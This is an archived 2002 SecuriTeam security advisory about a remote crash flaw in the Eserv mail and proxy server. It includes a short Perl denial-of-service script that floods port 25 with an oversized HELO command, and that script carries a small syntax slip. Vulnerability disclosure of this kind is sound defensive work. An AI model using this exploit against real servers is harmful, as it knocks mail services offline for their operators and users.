[NT] Eserv Remote Denial of Service (5mb HELO)

From: support@securiteam.com
Date: 12/15/02

    From: support@securiteam.com
    To: list@securiteam.com
    Date: 15 Dec 2002 23:24:59 +0200

    - - promotion

    Beyond Security would like to welcome Tiscali World Online
    to our service provider team.
    For more info on their service offering IP-Secure,
    please visit http://www.worldonline.co.za/services/work_ip.asp
    - - - - - - - - -

      Eserv Remote Denial of Service (5mb HELO)

    SUMMARY

     <http://www.eserv.ru/> Eserv is a Mail, News, Web, FTP and Proxy Servers
    for Win95/98/NT/2000. A security vulnerability in the product allows
    remote attackers to cause the server to crash by sending it more than 5Mb
    of data.

    DETAILS

    Vulnerable systems:
     * Eserv version 2.99 and prior

    Exploit:
    #!/usr/bin/perl -w
    #greetz: marocit
    #tool Eserv_dos.pl
    use IO::Socket;
    $buffer = "A"x 5080000 ;
    $hel = "HELO "
    $connect = IO::Socket::INET ->new (Proto=>"tcp", PeerAddr=> "$ARGV[0]",
    PeerPort=>"25"); unless ($connect) { die "cant connect $ARGV [0]" }
    print $connect "$hel$buffer";
    print "\nsending exploit......\n\n";

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:securma@caramail.com>
    securma massine.

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

    Relevant Pages

    • [NEWS] Java HTTP Proxy Vulnerability (Additional Details)
      (Securiteam)
    • [UNIX] Gridscan.com Security-risk
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • [NEWS] <BODY>Builder SQL modification
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • [UNIX] Path Disclosure Bug in TOPo
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Beyond Security would like to welcome Tiscali World Online ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • [UNIX] RRDTool Path Disclosure Vulnerability (MRTG)